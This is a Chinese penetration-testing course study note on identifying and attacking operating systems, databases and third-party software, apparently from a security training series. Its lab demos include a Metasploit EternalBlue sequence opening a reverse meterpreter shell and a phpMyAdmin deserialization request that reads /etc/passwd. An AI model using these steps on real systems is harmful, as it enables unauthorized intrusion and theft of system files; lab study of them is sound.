Day05 基础入门-系统及数据库等
声明:本文章仅仅是个人学习笔记,仅供交流学习使用,请勿用于非法用途
——小迪web安全渗透培训视频笔记
文章目录
前言
除去搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到Web或服务器的安全,导致网站或服务器权限的获取。
内容
操作系统层面
识别操作系统常见方法
通过网站或通过扫描相关软件识别
1. 通过url的大小写改变来判断服务器系统
大小写对网页都没有影响,这种情况就可以认定为windows服务器,因为windows服务器不区分大小写
大小写改变会报错,这个网站对应的操作系统是linux服务器
2. 也可以用TTL来判断服务器系统,相邻的值来判断
3. 可用
nmap
来判断操作系统
nmap -O IP
简要两者区别及识别意义
网站路径、大小写、文件在两个系统之间的适用性,兼容性
操作系统层面漏洞类型对应意义
有些漏洞危害不大,而有些漏洞会导致服务器权限的丢失。
漏洞类型的不同会造成利用这个漏洞时的条件
简要操作系统层面漏洞影响范围
利用漏洞去获取权限或者对某些服务进行干扰
数据库层面
识别数据库类型常见方法
通过网站识别数据库,通过脚本连接的数据库
ASP+Access(windows) 端口:无
PHP+Mysql 端口:3306
ASPX+Mssql(windows) 端口:1433
Jsp+Mssql,oracle 端口:1521
Python+Mongodb 端口:27017
…
端口扫描
数据库类型区别及识别意义
每个数据库里面的安全机制,写法结构都有些许不一样,同样产生的漏洞也不一样。
数据库常见漏洞类型及攻击
弱口令
简要数据库层面漏洞影响范围
得到网站管理员数据可登录后台,得到用户数据能登录用户信息,进行修改,通过数据库操作可进行漏洞攻击,也可以获取数据库权限和网站权限。
第三方层面
如何判断有哪些第三方平台或软件
多层次判断,不能仅限于端口扫描,根据不同的应用采取不同的方法。
简要为什么要识别第三方平台或软件
常见第三方平台或软件漏洞类型及攻击
简要第三方平台或软件安全测试的范围
补充
除去常规WEB安全及APP安全测试外,类似服务器单一或复杂的其他服务(邮件、游戏、负载均衡等)也可以作为安全测试目标,此类目标测试原则只是少了WEB应用或其他安全问题。所以明确安全测试思路是很重要的!
案例演示
- 上述涉及的基础知识演示
- 某操作系统层面漏洞演示
- 某数据库弱口令及漏洞演示
- 某第三方应用安全漏洞
以下案例不需要掌握漏洞的利用,只是了解一下各层面的漏洞
案例1:上述涉及的基础知识演示
详细看
内容
部分
案例2:某操作系统层面漏洞演示
本实验是在靶机进行的,请勿用于未授权的真实环境中,否则后果自负。
环境配置
靶机
win2008R2 x64
IP:192.168.3.31445端口开放
攻击机
kali
IP:192.168.3.222
操作
打开msf
msfconsole # 打开msf
use exploit/multi/handle
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp # 设置payload
查看配置参数
msf5> show options
设置参数
set lhost 192.168.3.222 # 设置本机地址(即攻击机的IP)
set rhost 192.168.3.31 # 设置目标地址
run
拿到权限
meterpreter > shell
meterpreter > ipconfig
可以看到
ipconfig
命令打印出来靶机IP:
192.168.3.31
案例3:某数据库弱口令及漏洞演示
https://vulhub.org/#/environments/mysql/CVE-2012-2122/
环境配置
靶机
Ubuntu + vulhub靶场环境
IP:192.168.131.135
攻击机
kali
操作
开启靶场环境(mysql漏洞环境)
cd vulhub靶场项目目录
cd mysql/CVE-2012-2122/
docker-compose up -d
进行攻击
nmap扫描端口
发现端口3306开放,对应mysql数据库服务
查找mysql数据库漏洞 ,符合
CVE-2012-2122
Mysql身份认证绕过漏洞
利用
msf
进行漏洞测试
成功
案例4:某第三方应用安全漏洞演示
https://vulhub.org/#/environments/phpmyadmin/WooYun-2016-199433/
环境配置
靶场
Ubuntu + vulhub靶场环境
IP:192.168.56.130
攻击机
win10 本地物理机
操作
开启漏洞环境
访问
http://your-ip:8080
,您将看到 phpmyadmin 主页。因为没有连接到数据库,我们会得到一个错误。但是这个漏洞与数据库无关,所以直接忽略。
Burpsuite发包
发送以下包 /etc/passwd:
POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
记得把 your-ip改成靶机的IP
结果
涉及资源
https://nmap.org/
# nmap
https://www.kali.org/
# kali官网
https://vulhub.org/
# vulhub
https://github.com/hellogoldsnakeman/masnmapscan-V1.0
# masnmapscan端口扫描器